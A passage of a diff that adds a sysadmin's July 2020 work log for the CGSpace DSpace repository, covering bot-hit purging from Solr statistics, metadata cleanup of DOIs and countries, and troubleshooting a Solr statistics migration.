+<li>CPU load and memory were not high then, but there was some load on the database and firewall&hellip;
+<ul>
+<li>Looking in the nginx logs I see a few IPs we&rsquo;ve seen recently, like those 199.47.x.x IPs from Turnitin (which I need to remember to purge from Solr again because I didn&rsquo;t update the spider agents on CGSpace yet) and some new one 186.112.8.167</li>
+<li>Also, the Turnitin bot doesn&rsquo;t re-use its Tomcat JSESSIONID, I see this from today:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># grep 199.47.87 dspace.log.2020-07-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+2815
+</code></pre><ul>
+<li>So I need to add this alternative user-agent to the Tomcat Crawler Session Manager valve to force it to re-use a common bot session</li>
+<li>There are around 9,000 requests from <code>186.112.8.167</code> in Colombia and has the user agent <code>Java/1.8.0_241</code>, but those were mostly to REST API and I don&rsquo;t see any hits in Solr</li>
+<li>Earlier in the day Linode had alerted that there was high outgoing bandwidth
+<ul>
+<li>I see some new bot from 134.155.96.78 made ~10,000 requests with the user agent&hellip; but it appears to already be in our DSpace user agent list via COUNTER-Robots:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible; heritrix/3.4.0-SNAPSHOT-2019-02-07T13:53:20Z +http://ifm.uni-mannheim.de)
+</code></pre><ul>
+<li>Generate a list of sponsors to update our controlled vocabulary:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &#34;dc.description.sponsorship&#34; ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
+COPY 125
+dspace=# \q
+$ csvcut -c 1 --tabs /tmp/2020-07-12-sponsors.csv &gt; dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
+# add XML formatting
+$ dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
+$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
+</code></pre><ul>
+<li>Deploy latest <code>5_x-prod</code> branch on CGSpace (linode18), run all system updates, and reboot the server
+<ul>
+<li>After rebooting it I had to restart Tomcat 7 once to get all Solr statistics cores to come up properly</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-13">2020-07-13</h2>
+<ul>
+<li>I recommended to Marie–Angelique that we use ROR for CG Core V2 (<a href="https://github.com/AgriculturalSemantics/cg-core/issues/27">#27</a>)</li>
+<li>Purge 2,700 hits from CodeObia IP addresses in CGSpace statistics&hellip; I wonder when they will figure out how to use a bot user agent</li>
+</ul>
+<h2 id="2020-07-14">2020-07-14</h2>
+<ul>
+<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(189618) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>Udana from WLE asked me about some items that didn&rsquo;t show Altmetric donuts
+<ul>
+<li>I checked his list and at least three of them actually <em>did</em> show donuts, and for four others I tweeted them manually to see if they would get a donut in a few hours:
+<ul>
+<li><a href="https://hdl.handle.net/10568/108477">https://hdl.handle.net/10568/108477</a></li>
+<li><a href="https://hdl.handle.net/10568/108475">https://hdl.handle.net/10568/108475</a></li>
+<li><a href="https://hdl.handle.net/10568/108361">https://hdl.handle.net/10568/108361</a></li>
+<li><a href="https://hdl.handle.net/10568/108360">https://hdl.handle.net/10568/108360</a></li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-15">2020-07-15</h2>
+<ul>
+<li>All four IWMI items that I tweeted yesterday have Altmetric donuts with a score of 1 now&hellip;</li>
+<li>Export CGSpace countries to check them against ISO 3166-1 and ISO 3166-3 (historic countries):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-07-15-countries.csv;
+COPY 194
+</code></pre><ul>
+<li>I wrote a script <code>iso3166-lookup.py</code> to check them:</li>
+</ul>
+<pre tabindex="0"><code>$ ./iso3166-1-lookup.py -i /tmp/2020-07-15-countries.csv -o /tmp/2020-07-15-countries-resolved.csv
+$ csvgrep -c matched -m false /tmp/2020-07-15-countries-resolved.csv       
+country,match type,matched
+CAPE VERDE,,false
+&#34;KOREA, REPUBLIC&#34;,,false
+PALESTINE,,false
+&#34;CONGO, DR&#34;,,false
+COTE D&#39;IVOIRE,,false
+RUSSIA,,false
+SYRIA,,false
+&#34;KOREA, DPR&#34;,,false
+SWAZILAND,,false
+MICRONESIA,,false
+TIBET,,false
+ZAIRE,,false
+COCOS ISLANDS,,false
+LAOS,,false
+IRAN,,false
+</code></pre><ul>
+<li>Check the database for DOIs that are not in the preferred &ldquo;<a href="https://doi.org/%22">https://doi.org/&quot;</a> format:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT text_value as &#34;cg.identifier.doi&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE &#39;https://doi.org/%&#39;) TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
+COPY 186
+</code></pre><ul>
+<li>Then I imported them into OpenRefine and replaced them in a new &ldquo;correct&rdquo; column using this GREL transform:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#34;dx.doi.org&#34;, &#34;doi.org&#34;).replace(&#34;http://&#34;, &#34;https://&#34;).replace(&#34;https://dx,doi,org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://doi.dx.org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi:&#34;, &#34;https://doi.org&#34;).replace(&#34;DOI: &#34;, &#34;https://doi.org/&#34;).replace(&#34;doi: &#34;, &#34;https://doi.org/&#34;).replace(&#34;http:/​/​dx.​doi.​org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx. doi.org. &#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi:&#34;, &#34;https://doi.org/&#34;).replace(&#34;hdl.handle.net&#34;, &#34;doi.org&#34;)
+</code></pre><ul>
+<li>Then I fixed the DOIs on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.doi -t &#39;correct&#39; -m 220
+</code></pre><ul>
+<li>I filed <a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/10">an issue on Debian&rsquo;s iso-codes</a> project to ask why &ldquo;Swaziland&rdquo; does not appear in the ISO 3166-3 list of historical country names despite it being changed to &ldquo;Eswatini&rdquo; in 2018.</li>
+<li>Atmire responded about the Solr issue
+<ul>
+<li>They said that it seems like a DSpace issue so that it&rsquo;s not their responsibility, and nobody responded to my question on the dspace-tech mailing list&hellip;</li>
+<li>I said I would try to do a migration on DSpace Test with more of CGSpace&rsquo;s Solr data to try and approximate how much of our data be affected</li>
+<li>I also asked them about the Tomcat 8.5 issue with CUA as well as the CUA group name issue that I had asked originally in April</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-20">2020-07-20</h2>
+<ul>
+<li>Looking at the nginx logs on CGSpace (linode18) last night I see that the Macaroni Bros have started using a unique identifier for at least one of their harvesters:</li>
+</ul>
+<pre tabindex="0"><code>217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] &#34;GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0&#34; 302 138 &#34;-&#34; &#34;ILRI Livestock Website Publications importer BOT&#34;
+</code></pre><ul>
+<li>I still see 12,000 records in Solr from this user agent, though.
+<ul>
+<li>I wonder why the DSpace bot list didn&rsquo;t get those&hellip; because it has &ldquo;bot&rdquo; which should cause Solr to not log the hit</li>
+</ul>
+</li>
+<li>I purged ~30,000 hits from Solr statistics based on the IPs above, but also for some agents like Drupal (which isn&rsquo;t in the list yet) and OgScrper (which is as of 2020-03)</li>
+<li>Some of my user agent patterns had been incorporated into COUNTER-Robots in 2020-07, but not all
+<ul>
+<li>I closed the <a href="https://github.com/atmire/COUNTER-Robots/pull/34">old pull request</a> and created a <a href="https://github.com/atmire/COUNTER-Robots/pull/36">new one</a></li>
+<li>Then I updated the lists in the <code>5_x-prod</code> and 6.x branches</li>
+</ul>
+</li>
+<li>I re-ran the <code>check-spider-hits.sh</code> script with the new lists and purged another 14,000 more stats hits for several years each (2020, 2019, 2018, 2017, 2016), around 70,000 total</li>
+<li>I looked at the <a href="https://clarisa.cgiar.org/">CLARISA</a> institutions list again, since I hadn&rsquo;t looked at it in over six months:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/Downloads/response_1595270924560.json | jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
+</code></pre><ul>
+<li>The API still needs a key unless you query from Swagger web interface
+<ul>
+<li>They currently have 3,469 institutions&hellip;</li>
+<li>Also, they still combine multiple text names into one string along with acronyms and countries:
+<ul>
+<li>Bundesministerium für wirtschaftliche Zusammen­arbeit und Entwicklung / Federal Ministry of Economic Cooperation and Development (Germany)</li>
+<li>Ministerio del Ambiente / Ministry of Environment (Peru)</li>
+<li>Carthage University / Université de Carthage</li>
+<li>Sweet Potato Research Institute (SPRI) of Chinese Academy of Agricultural Sciences (CAAS)</li>
+</ul>
+</li>
+<li>And I checked the list with my csv-metadata-quality tool and found it still has whitespace and unnecessary Unicode characters in several records:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv
+Removing excessive whitespace (name): Comitato Internazionale per lo Sviluppo dei Popoli /  International Committee for the Development of Peoples
+Removing excessive whitespace (name): Deutsche Landwirtschaftsgesellschaft /  German agriculture society
+Removing excessive whitespace (name): Institute of Arid Regions  of Medenine
+Replacing unnecessary Unicode (U+00AD): Bundesministerium für wirtschaftliche Zusammen­arbeit und Entwicklung / Federal Ministry of Economic Cooperation and Development (Germany)
+Removing unnecessary Unicode (U+200B): Agencia de Servicios a la Comercialización​ y Desarrollo de Mercados Agropecuarios
+</code></pre><ul>
+<li>I think the ROR is much better in every possible way</li>
+<li>Re-enabled all the yearly Solr statistics cores on DSpace Test (linode26) because they had been disabled by Atmire when they were testing on the server
+<ul>
+<li>Run system updates on the server and reboot it</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-21">2020-07-21</h2>
+<ul>
+<li>I built the latest 6.x branch on DSpace Test (linode26) and I noticed a few Font Awesome icons are missing in the Atmire CUA statlets
+<ul>
+<li>One was simple to fix by adding it to our font library in <code>fontawesome.js</code>, but there are two more that are printing hex values instead of using HTML elements:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/07/cua-font-awesome.png" alt="Atmire CUA missing icons"></p>
+<ul>
+<li>I had previously thought these were fixed by setting the <code>font-family</code> on the elements, but it doesn&rsquo;t appear to be working now
+<ul>
+<li>I filed a ticket with Atmire to ask them to use the HTML elements instead, as their code already uses those elsewhere</li>
+<li>I don&rsquo;t want to go back to using the large webfonts with CSS because the SVG + JS method saves us ~140KiB and causes at least three fewer network requests</li>
+</ul>
+</li>
+<li>I started processing the 2019 stats in a batch of 1 million on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
+...
+        *** Statistics Records with Legacy Id ***
+
+           6,359,966    Bistream View
+           2,204,775    Item View
+             139,266    Community View
+             131,234    Collection View
+             948,529    Community Search
+             593,974    Collection Search
+           1,682,818    Unexpected Type &amp; Full Site
+        --------------------------------------
+          12,060,562    TOTAL
+</code></pre><ul>
+<li>The statistics-2019 finished processing after about 9 hours so I started the 2018 ones:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
+        *** Statistics Records with Legacy Id ***
+
+           3,684,394    Bistream View
+           2,183,032    Item View
+             131,222    Community View
+              79,348    Collection View
+             345,529    Collection Search
+             322,223    Community Search
+             874,107    Unexpected Type &amp; Full Site
+        --------------------------------------
+           7,619,855    TOTAL
+</code></pre><ul>
+<li>Moayad finally made OpenRXV use a unique user agent:</li>
+</ul>
+<pre tabindex="0"><code>OpenRXV harvesting bot; https://github.com/ilri/OpenRXV
+</code></pre><ul>
+<li>I see nearly 200,000 hits in Solr from the IP address, though, so I need to make sure those are old ones from before today
+<ul>
+<li>I purged the hits for 178.62.93.141 as well as any from the old <code>axios/0.19.2</code> user agent</li>
+<li>I made some requests with and without the new user agent and only the ones without showed up in Solr</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-22">2020-07-22</h2>
+<ul>
+<li>Atmire merged my latest bot suggestions to the COUNTER-Robots project:
+<ul>
+<li><a href="https://github.com/atmire/COUNTER-Robots/pull/36">Add new bots</a></li>
+<li><a href="https://github.com/atmire/COUNTER-Robots/pull/35">COUNTER_Robots_list.json: Escape literal dots</a></li>
+<li><a href="https://github.com/atmire/COUNTER-Robots/pull/33">COUNTER_Robots_list.json: Remove anchors from okhttp</a></li>
+</ul>
+</li>
+<li>I will update the agent patterns on the CGSpace <code>5_x-prod</code> and 6.x branches</li>
+<li>Make some changes to the Bootstrap CSS and HTML configuration to improve readability and style on the CG Core v2 metadata reference guide and send a pull request to Marie (<a href="https://github.com/AgriculturalSemantics/cg-core/pull/29">#29</a>)</li>
+<li>The <code>solr-upgrade-statistics-6x</code> tool keeps crashing due to memory issues when processing 2018 stats
+<ul>
+<li>I reduced the number of records per batch from 10,000 to 5,000 and increased the memory to 3072 and it still crashes&hellip;</li>
+<li>I reduced the number of records per batch to 1,000 and it works, but still took like twenty minutes before it even started!</li>
+<li>Eventually after processing a few million records it crashed with this error:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+</code></pre><ul>
+<li>There were four records so I deleted them:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:10&lt;/query&gt;&lt;/delete&gt;&#39;
+</code></pre><ul>
+<li>Meeting with Moayad and Peter and Abenet to discuss the latest AReS changes</li>
+</ul>
+<h2 id="2020-07-23">2020-07-23</h2>
+<ul>
+<li>I closed all issues in the <a href="https://github.com/ilri/OpenRXV/issues">OpenRXV</a> and <a href="https://github.com/ilri/AReS/issues">AReS</a> GitHub repositories with screenshots so that Moayad can use them for his invoice</li>
+<li>The statistics-2018 core always crashes with the same error even after I deleted the &ldquo;id:10&rdquo; records&hellip;
+<ul>
+<li>I started the statistics-2017 core and it finished in 3:44:15</li>
+<li>I started the statistics-2016 core and it finished in 2:27:08</li>
+<li>I started the statistics-2015 core and it finished in 1:07:38</li>
+<li>I started the statistics-2014 core and it finished in 1:45:44</li>
+<li>I started the statistics-2013 core and it finished in 1:41:50</li>
+<li>I started the statistics-2012 core and it finished in 1:23:36</li>
+<li>I started the statistics-2011 core and it finished in 0:39:37</li>
+<li>I started the statistics-2010 core and it finished in 0:01:46</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-24">2020-07-24</h2>
+<ul>
+<li>Looking at the statistics-2019 Solr stats and see some interesting user agents and IPs
+<ul>
+<li>For example, I see 568,000 requests from 66.109.27.x in 2019-10, all with the same exact user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
+</code></pre><ul>
+<li>Also, in the same month with the same <em>exact</em> user agent, I see 300,000 from 192.157.89.x
+<ul>
+<li>The 66.109.27.x IPs belong to galaxyvisions.com</li>
+<li>The 192.157.89.x IPs belong to cologuard.com</li>
+<li>All these hosts were reported in late 2019 on abuseipdb.com</li>
+</ul>
+</li>
+<li>Then I see another one 163.172.71.23 that made 215,000 requests in 2019-09 and 2019-08
+<ul>
+<li>It belongs to poneytelecom.eu and is also in abuseipdb.com for PHP injection and directory traversal</li>
+<li>It uses this user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+</code></pre><ul>
+<li>In statistics-2018 I see more weird IPs
+<ul>
+<li>54.214.112.202 made 839,000 requests with no user agent&hellip;
+<ul>
+<li>It is on Amazon Web Services (AWS) and made 100% <code>statistics_type:view</code> so I guess it was harvesting via the REST API</li>
+</ul>
+</li>
+<li>A few IPs owned by perfectip.net made 400,000 requests in 2018-01
+<ul>
+<li>They are 2607:fa98:40:9:26b6:fdff:feff:195d and 2607:fa98:40:9:26b6:fdff:feff:1888 and 2607:fa98:40:9:26b6:fdff:feff:1c96 and 70.36.107.49</li>
+<li>All the requests used this user agent:</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
+</code></pre><ul>
+<li>Then there is 213.139.53.62 in 2018, which is on Orange Telecom Jordan, so it&rsquo;s definitely CodeObia / ICARDA and I will purge them</li>
+<li>Jesus, and then there are 100,000 from the ILRI harvestor on Linode on 2a01:7e00::f03c:91ff:fe0a:d645</li>
+<li>Jesus fuck there is 46.101.86.248 making 15,000 requests per month in 2018 with no user agent&hellip;</li>
+<li>Jesus fuck there is 84.38.130.177 in Latvia that was making 75,000 requests in 2018-11 and 2018-10</li>
+<li>Jesus fuck there is 104.198.9.108 on Google Cloud that was making 30,000 requests with no user agent</li>
+<li>I will purge the hits from all the following IPs:</li>
+</ul>
+<pre tabindex="0"><code>192.157.89.4
+192.157.89.5
+192.157.89.6
+192.157.89.7
+66.109.27.142
+66.109.27.139
+66.109.27.138
+66.109.27.140
+66.109.27.141
+2607:fa98:40:9:26b6:fdff:feff:1888
+2607:fa98:40:9:26b6:fdff:feff:195d
+2607:fa98:40:9:26b6:fdff:feff:1c96
+213.139.53.62
+2a01:7e00::f03c:91ff:fe0a:d645
+46.101.86.248
+54.214.112.202
+84.38.130.177
+104.198.9.108
+70.36.107.49
+</code></pre><ul>
+<li>In total these accounted for the following amount of requests in each year:
+<ul>
+<li>2020: 1436</li>
+<li>2019: 960274</li>
+<li>2018: 1588149</li>
+</ul>
+</li>
+<li>I noticed a few other user agents that should be purged too:</li>
+</ul>
+<pre tabindex="0"><code>^Java\/\d{1,2}.\d
+FlipboardProxy\/\d
+API scraper
+RebelMouse\/\d
+Iframely\/\d
+Python\/\d
+Ruby
+NING\/\d
+ubermetrics-technologies\.com
+Jetty\/\d
+scalaj-http\/\d
+mailto\:team@impactstory\.org
+</code></pre><ul>
+<li>I purged them from the stats too:
+<ul>
+<li>2020: 19553</li>
+<li>2019: 29745</li>
+<li>2018: 18083</li>
+<li>2017: 19399</li>
+<li>2016: 16283</li>
+<li>2015: 16659</li>
+<li>2014: 713</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-26">2020-07-26</h2>
+<ul>
+<li>I continued with the Solr ID to UUID migrations (solr-upgrade-statistics-6x) from last week and updated my notes for each core above
+<ul>
+<li>After all cores finished migrating I optimized them to delete old documents</li>
+</ul>
+</li>
+<li>Export some of the CGSpace Solr stats minus the Atmire CUA schema additions for Salem to play with:</li>
+</ul>
+<pre tabindex="0"><code>$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f &#39;time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]&#39; -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
+</code></pre><ul>
+<li>
+<p>Run system updates on DSpace Test (linode26) and reboot it</p>
+</li>
+<li>
+<p>I looked into the umigrated Solr records more and they are overwhelmingly <code>type: 5</code> (which means &ldquo;Site&rdquo; according to the DSpace constants):</p>
+<ul>
+<li>statistics
+<ul>
+<li>id: -1-unmigrated
+<ul>
+<li>type 5: 167316</li>
+</ul>
+</li>
+<li>id: 0-unmigrated
+<ul>
+<li>type 5: 32581</li>
+</ul>
+</li>
+<li>id: -1
+<ul>
+<li>type 5: 10198</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>statistics-2019
+<ul>
+<li>id: -1
+<ul>
+<li>type 5: 2690500</li>
+</ul>
+</li>
+<li>id: -1-unmigrated
+<ul>
+<li>type 5: 1348202</li>
+</ul>
+</li>
+<li>id: 0-unmigrated
+<ul>
+<li>type 5: 141576</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>statistics-2018
+<ul>
+<li>id: -1
+<ul>
+<li>type 5: 365466</li>
+</ul>
+</li>
+<li>id: -1-unmigrated
+<ul>
+<li>type 5: 254680</li>
+</ul>
+</li>
+<li>id: 0-unmigrated
+<ul>
+<li>type 5: 204854</li>
+</ul>
+</li>
+<li>145870-unmigrated
+<ul>
+<li>type 0: 83235</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>statistics-2017</li>
+<li>id: -1
+<ul>
+<li>type 5: 808346</li>
+</ul>
+</li>
+<li>id: -1-unmigrated
+<ul>
+<li>type 5: 598022</li>
+</ul>
+</li>
+<li>id: 0-unmigrated
+<ul>
+<li>type 5: 254014</li>
+</ul>
+</li>
+<li>145870-unmigrated
+<ul>
+<li>type 0: 28168</li>
+<li>bundleName THUMBNAIL: 28168</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>
+<p>There is another one appears in 2018 and 2017 at least of type 0, which would be download</p>
+<ul>
+<li>In that case the id is of a bitstream that no longer exists&hellip;?</li>
+</ul>
+</li>
+<li>
+<p>I started processing Solr stats with the Atmire tool now:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -c statistics -f -t 12
+</code></pre><ul>
+<li>This one failed after a few hours:</li>
+</ul>
+<pre tabindex="0"><code>Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn&#39;t be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+
+Run 2 — 100% — 2,237,670/2,239,523 docs — 12s — 2h 25m 41s
+Run 2 took 2h 25m 41s
+179,310 docs failed to process
+If run the update again with the resume option (-r) they will be reattempted
+</code></pre><ul>
+<li>I started the same script for the statistics-2019 core (12 million records&hellip;)</li>
+<li>Update an ILRI author&rsquo;s name on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p &#39;fuuu&#39; -f dc.contributor.author -t &#39;correct&#39; -m 3
+Fixed 13 occurences of: Muloi, D.
+Fixed 4 occurences of: Muloi, D.M.
+</code></pre><h2 id="2020-07-28">2020-07-28</h2>
+<ul>
+<li>I started analyzing the situation with the cases I&rsquo;ve seen where a Solr record fails to be migrated:
+<ul>
+<li><code>id: 0-unmigrated</code> are mostly (all?) <code>type: 5</code> aka site view</li>
+<li><code>id: -1-unmigrated</code> are mostly (all?) <code>type: 5</code> aka site view</li>
+<li><code>id: -1</code> are mostly (all?) <code>type: 5</code> aka site view</li>
+<li><code>id: 59184-unmigrated</code> where &ldquo;59184&rdquo; is the id of an item or bitstream that no longer exists</li>
+</ul>
+</li>
+<li>Why doesn&rsquo;t Atmire&rsquo;s code ignore any id with &ldquo;-unmigrated&rdquo;?</li>
+<li>I sent feedback to Atmire since they had responded to my previous question yesterday
+<ul>
+<li>They said that the DSpace 6 version of CUA does not work with Tomcat 8.5&hellip;</li>
+</ul>
+</li>
+<li>I spent a few hours trying to write a <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+tasks+in+Jython">Jython-based curation task</a> to update ISO 3166-1 Alpha2 country codes based on each item&rsquo;s ISO 3166-1 country
+<ul>
+<li>Peter doesn&rsquo;t want to use the ISO 3166-1 list because he objects to a few names, so I thought we might be able to use country codes or numeric codes and update the names with a curation task</li>
+<li>The work is very rough but kinda works: <a href="https://gist.github.com/alanorth/6a31af592b3467f7b63ac8aea7c75d52">mytask.py</a></li>
+<li>What is nice is that the <code>dso.update()</code> method updates the data the &ldquo;DSpace way&rdquo; so we don&rsquo;t need to re-index Solr</li>
+<li>I had a clever idea to &ldquo;vendor&rdquo; the pycountry code using <code>pip install pycountry -t</code>, but pycountry dropped support for Python 2 in 2019 so we can only use an outdated version</li>
+<li>In the end it&rsquo;s really limiting to this particular task in Jython because we are stuck with Python 2, we can&rsquo;t use virtual environments, and there is a lot of code we&rsquo;d need to write to be able to handle the ISO 3166 country lists</li>
+<li>Python 2 is no longer supported by the Python community anyways so it&rsquo;s probably better to figure out how to do this in Java</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-29">2020-07-29</h2>
+<ul>
+<li>The Atmire stats tool (com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI) created 150GB of log files due to errors and the disk got full on DSpace Test (linode26)
+<ul>
+<li>This morning I had noticed that the run I started last night said that 54,000,000 (54 million!) records failed to process, but the core only had 6 million or so documents to process&hellip;!</li>
+<li>I removed the large log files and optimized the Solr core</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-07-30">2020-07-30</h2>
+<ul>
+<li>Looking into ISO 3166-1 from the iso-codes package
+<ul>
+<li>I see that all current 249 countries have names, 173 have official names, and 6 have common names:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># grep -c numeric /usr/share/iso-codes/json/iso_3166-1.json
+249
+# grep -c -E &#39;&#34;name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
+249
+# grep -c -E &#39;&#34;official_name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
+173
+# grep -c -E &#39;&#34;common_name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
+6
+</code></pre><ul>
+<li>Wow, the <code>CC-BY-NC-ND-3.0-IGO</code> license that I had <a href="https://github.com/spdx/license-list-XML/issues/767">requested in 2019-02</a> was finally merged into SPDX&hellip;</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
